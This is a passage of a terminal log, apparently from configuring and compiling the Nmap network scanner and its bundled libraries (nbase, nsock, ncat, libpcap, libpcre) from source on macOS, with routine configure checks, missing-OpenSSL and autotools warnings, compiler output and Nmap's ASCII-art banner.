  798. checking for ranlib... ranlib
  799. checking build system type... x86_64-apple-darwin17.2.0
  800. checking host system type... x86_64-apple-darwin17.2.0
  801. checking for inline... inline
  802. checking how to run the C preprocessor... gcc -E
  803. checking for grep that handles long lines and -e... /usr/bin/grep
  804. checking for egrep... /usr/bin/grep -E
  805. checking for ANSI C header files... yes
  806. checking for sys/types.h... yes
  807. checking for sys/stat.h... yes
  808. checking for stdlib.h... yes
  809. checking for string.h... yes
  810. checking for memory.h... yes
  811. checking for strings.h... yes
  812. checking for inttypes.h... yes
  813. checking for stdint.h... yes
  814. checking for unistd.h... yes
  815. checking for string.h... (cached) yes
  816. checking getopt.h usability... yes
  817. checking getopt.h presence... yes
  818. checking for getopt.h... yes
  819. checking for strings.h... (cached) yes
  820. checking sys/param.h usability... yes
  821. checking sys/param.h presence... yes
  822. checking for sys/param.h... yes
  823. checking sys/time.h usability... yes
  824. checking sys/time.h presence... yes
  825. checking for sys/time.h... yes
  826. checking for unistd.h... (cached) yes
  827. checking errno.h usability... yes
  828. checking errno.h presence... yes
  829. checking for errno.h... yes
  830. checking sys/select.h usability... yes
  831. checking sys/select.h presence... yes
  832. checking for sys/select.h... yes
  833. checking for sys/types.h... (cached) yes
  834. checking sys/socket.h usability... yes
  835. checking sys/socket.h presence... yes
  836. checking for sys/socket.h... yes
  837. checking netinet/in.h usability... yes
  838. checking netinet/in.h presence... yes
  839. checking for netinet/in.h... yes
  840. checking arpa/inet.h usability... yes
  841. checking arpa/inet.h presence... yes
  842. checking for arpa/inet.h... yes
  843. checking for sys/stat.h... (cached) yes
  844. checking netdb.h usability... yes
  845. checking netdb.h presence... yes
  846. checking for netdb.h... yes
  847. checking sys/wait.h usability... yes
  848. checking sys/wait.h presence... yes
  849. checking for sys/wait.h... yes
  850. checking fcntl.h usability... yes
  851. checking fcntl.h presence... yes
  852. checking for fcntl.h... yes
  853. checking sys/resource.h usability... yes
  854. checking sys/resource.h presence... yes
  855. checking for sys/resource.h... yes
  856. checking for inttypes.h... (cached) yes
  857. checking mach-o/dyld.h usability... yes
  858. checking mach-o/dyld.h presence... yes
  859. checking for mach-o/dyld.h... yes
  860. checking whether time.h and sys/time.h may both be included... yes
  861. checking for sys/socket.h... (cached) yes
  862. checking for net/if.h... yes
  863. checking for __attribute__... yes
  864. checking if sockaddr{} has sa_len member... yes
  865. checking whether byte ordering is bigendian... no
  866. checking for int8_t... yes
  867. checking for int16_t... yes
  868. checking for int32_t... yes
  869. checking for int64_t... yes
  870. checking for uint8_t... yes
  871. checking for uint16_t... yes
  872. checking for uint32_t... yes
  873. checking for uint64_t... yes
  874. checking for snprintf... yes
  875. checking for vsnprintf... yes
  876. checking for nanosleep... yes
  877. checking for strerror... yes
  878. checking for strcasestr... yes
  879. checking for strcasecmp... yes
  880. checking for strncasecmp... yes
  881. checking for signal... yes
  882. checking for vsnprintf... (cached) yes
  883. checking for snprintf... (cached) yes
  884. checking for asprintf... yes
  885. checking for asnprintf... no
  886. checking for vasprintf... yes
  887. checking for vasnprintf... no
  888. checking for getopt... yes
  889. checking for getopt_long_only... yes
  890. checking for usleep... yes
  891. checking for gettimeofday... yes
  892. checking for sleep... yes
  893. checking for getopt_long_only... (cached) yes
  894. checking for strcasecmp... (cached) yes
  895. checking for strncasecmp... (cached) yes
  896. checking for library containing getaddrinfo... none required
  897. checking for library containing gai_strerror... none required
  898. checking for library containing getnameinfo... none required
  899. checking for gai_strerror... yes
  900. checking for inet_ntop... yes
  901. checking for inet_pton... yes
  902. checking for working getaddrinfo... yes
  903. checking for library containing inet_addr... none required
  904. checking for working getnameinfo... yes
  905. checking for sockaddr_in6... yes
  906. checking for sockaddr_storage... yes
  907. checking for AF_INET6 definition... yes
  908. checking for IPv6 support... yes
  909. checking openssl/ssl.h usability... no
  910. checking openssl/ssl.h presence... no
  911. checking for openssl/ssl.h... no
  912. configure: WARNING: Failed to find openssl/ssl.h so OpenSSL will not be used. If it
  913. is installed you can try the --with-openssl=DIR argument
  914. checking for /proc/self/exe... no
  915. configure: creating ./config.status
  916. config.status: creating Makefile
  917. config.status: creating nbase_config.h
  918. === configuring in nsock/src (/Users/osx/Documents/nmap/nsock/src)
  919. configure: running /bin/sh ./configure --disable-option-checking '--prefix=/usr/local'  --cache-file=/dev/null --srcdir=.
  920. checking build system type... x86_64-apple-darwin17.2.0
  921. checking host system type... x86_64-apple-darwin17.2.0
  922. checking for gcc... gcc
  923. checking whether the C compiler works... yes
  924. checking for C compiler default output file name... a.out
  925. checking for suffix of executables...
  926. checking whether we are cross compiling... no
  927. checking for suffix of object files... o
  928. checking whether we are using the GNU C compiler... yes
  929. checking whether gcc accepts -g... yes
  930. checking for gcc option to accept ISO C89... none needed
  931. checking how to run the C preprocessor... gcc -E
  932. checking for grep that handles long lines and -e... /usr/bin/grep
  933. checking for egrep... /usr/bin/grep -E
  934. checking for ANSI C header files... yes
  935. checking for sys/types.h... yes
  936. checking for sys/stat.h... yes
  937. checking for stdlib.h... yes
  938. checking for string.h... yes
  939. checking for memory.h... yes
  940. checking for strings.h... yes
  941. checking for inttypes.h... yes
  942. checking for stdint.h... yes
  943. checking for unistd.h... yes
  944. checking pcap.h usability... yes
  945. checking pcap.h presence... yes
  946. checking for pcap.h... yes
  947. checking if PCAP_NETMASK_UNKNOWN is defined/handled by libpcap... yes
  948. checking linux/version.h usability... no
  949. checking linux/version.h presence... no
  950. checking for linux/version.h... no
  951. checking for Linux epoll(7) interface... no
  952. checking for poll(2)... yes
  953. checking for kqueue... yes
  954. checking for kevent... yes
  955. checking for gcc... (cached) gcc
  956. checking whether we are using the GNU C compiler... (cached) yes
  957. checking whether gcc accepts -g... (cached) yes
  958. checking for gcc option to accept ISO C89... (cached) none needed
  959. checking for ranlib... ranlib
  960. checking for gethostent... yes
  961. checking for setsockopt... yes
  962. checking for nanosleep... yes
  963. checking for ANSI C header files... (cached) yes
  964. checking net/bpf.h usability... yes
  965. checking net/bpf.h presence... yes
  966. checking for net/bpf.h... yes
  967. checking sys/ioctl.h usability... yes
  968. checking sys/ioctl.h presence... yes
  969. checking for sys/ioctl.h... yes
  970. checking sys/un.h usability... yes
  971. checking sys/un.h presence... yes
  972. checking for sys/un.h... yes
  973. checking netdb.h usability... yes
  974. checking netdb.h presence... yes
  975. checking for netdb.h... yes
  976. checking openssl/ssl.h usability... no
  977. checking openssl/ssl.h presence... no
  978. checking for openssl/ssl.h... no
  979. configure: WARNING: Failed to find openssl/ssl.h so OpenSSL will not be used. If it is installed you can try the --with-openssl=DIR argument
  980. checking for library containing dlopen... none required
  981. configure: creating ./config.status
  982. config.status: creating Makefile
  983. config.status: creating ../tests/Makefile
  984. config.status: creating ../include/nsock_config.h
  985. === configuring in ncat (/Users/osx/Documents/nmap/ncat)
  986. configure: running /bin/sh ./configure --disable-option-checking '--prefix=/usr/local'  --cache-file=/dev/null --srcdir=.
  987. checking build system type... x86_64-apple-darwin17.2.0
  988. checking host system type... x86_64-apple-darwin17.2.0
  989. checking for gcc... gcc
  990. checking whether the C compiler works... yes
  991. checking for C compiler default output file name... a.out
  992. checking for suffix of executables...
  993. checking whether we are cross compiling... no
  994. checking for suffix of object files... o
  995. checking whether we are using the GNU C compiler... yes
  996. checking whether gcc accepts -g... yes
  997. checking for gcc option to accept ISO C89... none needed
  998. checking for a BSD-compatible install... /usr/bin/install -c
  999. checking for strip... /usr/bin/strip
  1000. checking how to run the C preprocessor... gcc -E
  1001. checking for grep that handles long lines and -e... /usr/bin/grep
  1002. checking for egrep... /usr/bin/grep -E
  1003. checking for ANSI C header files... yes
  1004. checking for sys/wait.h that is POSIX.1 compatible... yes
  1005. checking for sys/types.h... yes
  1006. checking for sys/stat.h... yes
  1007. checking for stdlib.h... yes
  1008. checking for string.h... yes
  1009. checking for memory.h... yes
  1010. checking for strings.h... yes
  1011. checking for inttypes.h... yes
  1012. checking for stdint.h... yes
  1013. checking for unistd.h... yes
  1014. checking fcntl.h usability... yes
  1015. checking fcntl.h presence... yes
  1016. checking for fcntl.h... yes
  1017. checking limits.h usability... yes
  1018. checking limits.h presence... yes
  1019. checking for limits.h... yes
  1020. checking netdb.h usability... yes
  1021. checking netdb.h presence... yes
  1022. checking for netdb.h... yes
  1023. checking netinet/in.h usability... yes
  1024. checking netinet/in.h presence... yes
  1025. checking for netinet/in.h... yes
  1026. checking for stdlib.h... (cached) yes
  1027. checking for string.h... (cached) yes
  1028. checking for strings.h... (cached) yes
  1029. checking sys/param.h usability... yes
  1030. checking sys/param.h presence... yes
  1031. checking for sys/param.h... yes
  1032. checking sys/socket.h usability... yes
  1033. checking sys/socket.h presence... yes
  1034. checking for sys/socket.h... yes
  1035. checking sys/time.h usability... yes
  1036. checking sys/time.h presence... yes
  1037. checking for sys/time.h... yes
  1038. checking sys/timeb.h usability... yes
  1039. checking sys/timeb.h presence... yes
  1040. checking for sys/timeb.h... yes
  1041. checking for unistd.h... (cached) yes
  1042. checking sys/un.h usability... yes
  1043. checking sys/un.h presence... yes
  1044. checking for sys/un.h... yes
  1045. checking whether stat file-mode macros are broken... no
  1046. checking for an ANSI C-conforming const... yes
  1047. checking whether time.h and sys/time.h may both be included... yes
  1048. checking for pid_t... yes
  1049. checking vfork.h usability... no
  1050. checking vfork.h presence... no
  1051. checking for vfork.h... no
  1052. checking for fork... yes
  1053. checking for vfork... yes
  1054. checking for working fork... yes
  1055. checking for working vfork... (cached) yes
  1056. checking sys/select.h usability... yes
  1057. checking sys/select.h presence... yes
  1058. checking for sys/select.h... yes
  1059. checking for sys/socket.h... (cached) yes
  1060. checking types of arguments for select... int,fd_set *,struct timeval *
  1061. checking return type of signal handlers... void
  1062. checking for vprintf... yes
  1063. checking for _doprnt... no
  1064. checking for dup2... yes
  1065. checking for gettimeofday... yes
  1066. checking for inet_ntoa... yes
  1067. checking for memset... yes
  1068. checking for mkstemp... yes
  1069. checking for select... yes
  1070. checking for socket... yes
  1071. checking for strcasecmp... yes
  1072. checking for strchr... yes
  1073. checking for strdup... yes
  1074. checking for strerror... yes
  1075. checking for strncasecmp... yes
  1076. checking for strtol... yes
  1077. checking for library containing setsockopt... none required
  1078. checking for library containing gethostbyname... none required
  1079. checking for library containing dlopen... none required
  1080. checking openssl/ssl.h usability... no
  1081. checking openssl/ssl.h presence... no
  1082. checking for openssl/ssl.h... no
  1083. configure: WARNING: Failed to find openssl/ssl.h so OpenSSL will not be used.
  1084.     If it is installed you can try the --with-openssl=DIR argument
  1085. checking pcap.h usability... yes
  1086. checking pcap.h presence... yes
  1087. checking for pcap.h... yes
  1088. checking for pcap_datalink in -lpcap... yes
  1089. checking sys/ioccom.h usability... yes
  1090. checking sys/ioccom.h presence... yes
  1091. checking for sys/ioccom.h... yes
  1092. checking for sys/time.h... (cached) yes
  1093. checking net/bpf.h usability... yes
  1094. checking net/bpf.h presence... yes
  1095. checking for net/bpf.h... yes
  1096. checking if libpcap is suitable... no
  1097. checking for odm_initialize in -lodm... no
  1098. checking for odm_initialize in -lodm... (cached) no
  1099. checking for _system_configuration in -lcfg... no
  1100. checking lua5.3/lua.h usability... no
  1101. checking lua5.3/lua.h presence... no
  1102. checking for lua5.3/lua.h... no
  1103. checking lua/5.3/lua.h usability... no
  1104. checking lua/5.3/lua.h presence... no
  1105. checking for lua/5.3/lua.h... no
  1106. checking lua.h usability... no
  1107. checking lua.h presence... no
  1108. checking for lua.h... no
  1109. checking lua/lua.h usability... no
  1110. checking lua/lua.h presence... no
  1111. checking for lua/lua.h... no
  1112. checking for lua version >= 503... checking for g++... g++
  1113. checking whether we are using the GNU C++ compiler... yes
  1114. checking whether g++ accepts -g... yes
  1115. no
  1116. configure: creating ./config.status
  1117. config.status: creating Makefile
  1118. config.status: creating config.h
  1119.            .       .
  1120.            \`-"'"-'/
  1121.             } 6 6 {
  1122.            ==. Y ,==
  1123.              /^^^\  .
  1124.             /     \  )  Ncat: A modern interpretation of classic Netcat
  1125.            (  )-(  )/
  1126.            -""---""---   /
  1127.           /   Ncat    \_/
  1128.          (     ____
  1129.           \_.=|____E
  1130. Configuration complete.
  1131.  
  1132.                    ___.-------.___
  1133.                _.-' ___.--;--.___ `-._
  1134.             .-' _.-'  /  .+.  \  `-._ `-.
  1135.           .' .-'      |-|-o-|-|      `-. `.
  1136.          (_ <O__      \  `+'  /      __O> _)
  1137.            `--._``-..__`._|_.'__..-''_.--'
  1138.                  ``--._________.--''
  1139.   ____  _____  ____    ____       _       _______
  1140.  |_   \|_   _||_   \  /   _|     / \     |_   __ \
  1141.    |   \ | |    |   \/   |      / _ \      | |__) |
  1142.    | |\ \| |    | |\  /| |     / ___ \     |  ___/
  1143.   _| |_\   |_  _| |_\/_| |_  _/ /   \ \_  _| |_
  1144.  |_____|\____||_____||_____||____| |____||_____|
  1145.  
  1146.  NMAP IS A POWERFUL TOOL -- USE CAREFULLY AND RESPONSIBLY
  1147. Configured with: ndiff zenmap nping zlib lua ncat
  1148. Configured without: localdirs openssl libssh2 nmap-update
  1149. Type make (or gmake on some *BSD machines) to compile.
  1150. WARNING: You are compiling without OpenSSL
  1151. WARNING: You are compiling without LibSSH2
  1152.  
  1153.  
  1154.  
  1155.  
  1156.  
  1157.  
  1158.  
  1159.  
  1160.  
  1161.  
  1162. SixMillionKilaTons:nmap osx$ make
  1163. g++ -MM -I./liblinear -I./liblua -I./libdnet-stripped/include -I./libpcre  -I./libpcap -I./nbase -I./nsock/include -DHAVE_CONFIG_H -DNMAP_NAME=\"Nmap\" -DNMAP_URL=\"https://nmap.org\" -DNMAP_PLATFORM=\"x86_64-apple-darwin17.2.0\" -DNMAPDATADIR=\"/usr/local/share/nmap\" -D_FORTIFY_SOURCE=2 charpool.cc FingerPrintResults.cc FPEngine.cc FPModel.cc idle_scan.cc MACLookup.cc main.cc nmap.cc nmap_dns.cc nmap_error.cc nmap_ftp.cc NmapOps.cc NmapOutputTable.cc nmap_tty.cc osscan2.cc osscan.cc output.cc payload.cc portlist.cc portreasons.cc protocols.cc scan_engine.cc scan_engine_connect.cc scan_engine_raw.cc scan_lists.cc service_scan.cc services.cc Target.cc TargetGroup.cc targets.cc tcpip.cc timing.cc traceroute.cc utils.cc xml.cc nse_main.cc nse_utility.cc nse_nsock.cc nse_dnet.cc nse_fs.cc nse_nmaplib.cc nse_debug.cc nse_pcrelib.cc nse_lpeg.cc > makefile.dep
  1164. Compiling libnetutil
  1165. cd libnetutil && /Library/Developer/CommandLineTools/usr/bin/make
  1166. g++ -MM -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 ./netutil.cc ./PacketElement.cc ./NetworkLayerElement.cc ./ARPHeader.cc ./PacketElement.cc ./NetworkLayerElement.cc ./TransportLayerElement.cc ./ARPHeader.cc ./EthernetHeader.cc ./ICMPv4Header.cc ./ICMPv6Header.cc ./IPv4Header.cc ./IPv6Header.cc ./TCPHeader.cc ./UDPHeader.cc ./RawData.cc ./HopByHopHeader.cc ./DestOptsHeader.cc ./FragmentHeader.cc ./RoutingHeader.cc ./PacketParser.cc > makefile.dep
  1167. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing netutil.cc -o netutil.o
  1168. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing PacketElement.cc -o PacketElement.o
  1169. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing NetworkLayerElement.cc -o NetworkLayerElement.o
  1170. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing TransportLayerElement.cc -o TransportLayerElement.o
  1171. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing ARPHeader.cc -o ARPHeader.o
  1172. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing EthernetHeader.cc -o EthernetHeader.o
  1173. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing ICMPv4Header.cc -o ICMPv4Header.o
  1174. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing ICMPv6Header.cc -o ICMPv6Header.o
  1175. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing IPv4Header.cc -o IPv4Header.o
  1176. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing IPv6Header.cc -o IPv6Header.o
  1177. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing TCPHeader.cc -o TCPHeader.o
  1178. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing UDPHeader.cc -o UDPHeader.o
  1179. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing RawData.cc -o RawData.o
  1180. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing HopByHopHeader.cc -o HopByHopHeader.o
  1181. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing DestOptsHeader.cc -o DestOptsHeader.o
  1182. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing FragmentHeader.cc -o FragmentHeader.o
  1183. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing RoutingHeader.cc -o RoutingHeader.o
  1184. g++ -c -I../liblinear -I../liblua -I../libdnet-stripped/include -I../libpcre  -I../libpcap -I../nbase -I../nsock/include -DHAVE_CONFIG_H -D_FORTIFY_SOURCE=2 -no-cpp-precomp -g -O2 -Wall -fno-strict-aliasing PacketParser.cc -o PacketParser.o
  1185. rm -f libnetutil.a
  1186. ar cr libnetutil.a netutil.o PacketElement.o NetworkLayerElement.o TransportLayerElement.o ARPHeader.o EthernetHeader.o ICMPv4Header.o ICMPv6Header.o IPv4Header.o IPv6Header.o TCPHeader.o UDPHeader.o RawData.o HopByHopHeader.o DestOptsHeader.o FragmentHeader.o RoutingHeader.o  PacketParser.o
  1187. /Library/Developer/CommandLineTools/usr/bin/ranlib: file: libnetutil.a(NetworkLayerElement.o) has no symbols
  1188. ranlib libnetutil.a
  1189. /Library/Developer/CommandLineTools/usr/bin/ranlib: file: libnetutil.a(NetworkLayerElement.o) has no symbols
  1190. Compiling liblinear
  1191. g++ -g -O2 -Wall   -Wno-uninitialized -c -o linear.o linear.cpp
  1192. g++ -g -O2 -Wall   -Wno-uninitialized -c -o tron.o tron.cpp
  1193. cd blas; /Library/Developer/CommandLineTools/usr/bin/make OPTFLAGS='-g -O2 -Wall   -Wno-uninitialized' CC='gcc';
  1194. gcc -g -O2 -Wall   -Wno-uninitialized -c dnrm2.c
  1195. gcc -g -O2 -Wall   -Wno-uninitialized -c daxpy.c
  1196. gcc -g -O2 -Wall   -Wno-uninitialized -c ddot.c
  1197. gcc -g -O2 -Wall   -Wno-uninitialized -c dscal.c
  1198. ar rcv blas.a dnrm2.o daxpy.o ddot.o dscal.o  
  1199. a - dnrm2.o
  1200. a - daxpy.o
  1201. a - ddot.o
  1202. a - dscal.o
  1203. ranlib  blas.a
  1204. ar rcv liblinear.a linear.o tron.o blas/*.o
  1205. a - linear.o
  1206. a - tron.o
  1207. a - blas/daxpy.o
  1208. a - blas/ddot.o
  1209. a - blas/dnrm2.o
  1210. a - blas/dscal.o
  1211. ranlib liblinear.a
  1212. Compiling libpcap
  1213. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c ./pcap-bpf.c
  1214. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c ./fad-getad.c
  1215. if grep GIT ./VERSION >/dev/null; then \
  1216.         read ver <./VERSION; \
  1217.         echo $ver | tr -d '\012'; \
  1218.         date +_%Y_%m_%d; \
  1219.     else \
  1220.         cat ./VERSION; \
  1221.     fi | sed -e 's/.*/static const char pcap_version_string[] = "libpcap version &";/' > version.h
  1222. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c ./pcap.c
  1223. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c ./inet.c
  1224. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c ./gencode.c
  1225. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c ./optimize.c
  1226. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c ./nametoaddr.c
  1227. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c ./etherent.c
  1228. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c ./savefile.c
  1229. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c ./sf-pcap.c
  1230. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c ./sf-pcap-ng.c
  1231. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c ./pcap-common.c
  1232. ./pcap-common.c:1324:6: warning: logical not is only applied to the left hand
  1233.      side of this comparison [-Wlogical-not-parentheses]
  1234.        if (!(nfhdr->nflog_version) == 0) {
  1235.            ^                       ~~
  1236. ./pcap-common.c:1324:6: note: add parentheses after the '!' to evaluate the
  1237.      comparison first
  1238.        if (!(nfhdr->nflog_version) == 0) {
  1239.            ^
  1240.             (                          )
  1241. ./pcap-common.c:1324:6: note: add parentheses around left hand side expression
  1242.      to silence this warning
  1243.        if (!(nfhdr->nflog_version) == 0) {
  1244.            ^
  1245.            (                      )
  1246. 1 warning generated.
  1247. ./pcap-common.c:1324:6: warning: logical not is only applied to the left hand
  1248.      side of this comparison [-Wlogical-not-parentheses]
  1249.        if (!(nfhdr->nflog_version) == 0) {
  1250.            ^                       ~~
  1251. ./pcap-common.c:1324:6: note: add parentheses after the '!' to evaluate the
  1252.      comparison first
  1253.        if (!(nfhdr->nflog_version) == 0) {
  1254.            ^
  1255.             (                          )
  1256. ./pcap-common.c:1324:6: note: add parentheses around left hand side expression
  1257.      to silence this warning
  1258.        if (!(nfhdr->nflog_version) == 0) {
  1259.            ^
  1260.            (                      )
  1261. 1 warning generated.
  1262. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c ./bpf_image.c
  1263. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c ./bpf_dump.c
  1264. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c scanner.c
  1265. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -Dyylval=pcap_lval -c grammar.c
  1266. rm -f bpf_filter.c
  1267. ln -s ./bpf/net/bpf_filter.c bpf_filter.c
  1268. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c bpf_filter.c
  1269. if grep GIT ./VERSION >/dev/null; then \
  1270.         read ver <./VERSION; \
  1271.         echo $ver | tr -d '\012'; \
  1272.         date +_%Y_%m_%d; \
  1273.     else \
  1274.         cat ./VERSION; \
  1275.     fi | sed -e 's/.*/char pcap_version[] = "&";/' > version.c
  1276. gcc -fno-common -arch x86_64 -arch i386 -I.  -DHAVE_CONFIG_H  -D_U_="__attribute__((unused))" -g -O2    -c version.c
  1277. ar rc libpcap.a pcap-bpf.o fad-getad.o pcap.o inet.o gencode.o optimize.o nametoaddr.o etherent.o savefile.o sf-pcap.o sf-pcap-ng.o pcap-common.o bpf_image.o bpf_dump.o  scanner.o grammar.o bpf_filter.o version.o  
  1278. ranlib libpcap.a
  1279. ./config.status --file=pcap-config.tmp:./pcap-config.in
  1280. config.status: creating pcap-config.tmp
  1281. mv pcap-config.tmp pcap-config
  1282. chmod a+x pcap-config
  1283. Compiling libpcre
  1284. cd . && /bin/sh /Users/osx/Documents/nmap/missing --run aclocal-1.10
  1285. /Users/osx/Documents/nmap/missing: line 52: aclocal-1.10: command not found
  1286. WARNING: `aclocal-1.10' is missing on your system.  You should only need it if
  1287.         you modified `acinclude.m4' or `configure.ac'.  You might want
  1288.         to install the `Automake' and `Perl' packages.  Grab them from
  1289.         any GNU archive site.
  1290. cd . && /bin/sh /Users/osx/Documents/nmap/missing --run autoconf
  1291. /Users/osx/Documents/nmap/missing: line 52: autoconf: command not found
  1292. WARNING: `autoconf' is missing on your system.  You should only need it if
  1293.         you modified `configure.ac'.  You might want to install the
  1294.         `Autoconf' and `GNU m4' packages.  Grab them from any GNU
  1295.         archive site.
  1296. /bin/sh ./config.status --recheck
  1297. running CONFIG_SHELL=/bin/sh /bin/sh ./configure --disable-option-checking --prefix=/usr/local --cache-file=/dev/null --srcdir=. --no-create --no-recursion
  1298. checking for a BSD-compatible install... /usr/bin/install -c
  1299. checking whether build environment is sane... yes
  1300. checking for a thread-safe mkdir -p... ./../shtool install -c -d
  1301. checking for gawk... no
  1302. checking for mawk... no
  1303. checking for nawk... no
  1304. checking for awk... awk
  1305. checking whether make sets $(MAKE)... yes
  1306. checking for gcc... gcc
  1307. checking whether the C compiler works... yes
  1308. checking for C compiler default output file name... a.out
  1309. checking for suffix of executables...
  1310. checking whether we are cross compiling... no
  1311. checking for suffix of object files... o
  1312. checking whether we are using the GNU C compiler... yes
  1313. checking whether gcc accepts -g... yes
  1314. checking for gcc option to accept ISO C89... none needed
  1315. checking for style of include used by make... GNU
  1316. checking dependency style of gcc... gcc3
  1317. checking for ranlib... ranlib
  1318. checking whether ln -s works... yes
  1319. checking how to run the C preprocessor... gcc -E
  1320. checking for grep that handles long lines and -e... /usr/bin/grep
  1321. checking for egrep... /usr/bin/grep -E
  1322. checking for ANSI C header files... yes
  1323. checking for sys/types.h... yes
  1324. checking for sys/stat.h... yes
  1325. checking for stdlib.h... yes
  1326. checking for string.h... yes
  1327. checking for memory.h... yes
  1328. checking for strings.h... yes
  1329. checking for inttypes.h... yes
  1330. checking for stdint.h... yes
  1331. checking for unistd.h... yes
  1332. checking limits.h usability... yes
  1333. checking limits.h presence... yes
  1334. checking for limits.h... yes
  1335. checking for sys/types.h... (cached) yes
  1336. checking for sys/stat.h... (cached) yes
  1337. checking dirent.h usability... yes
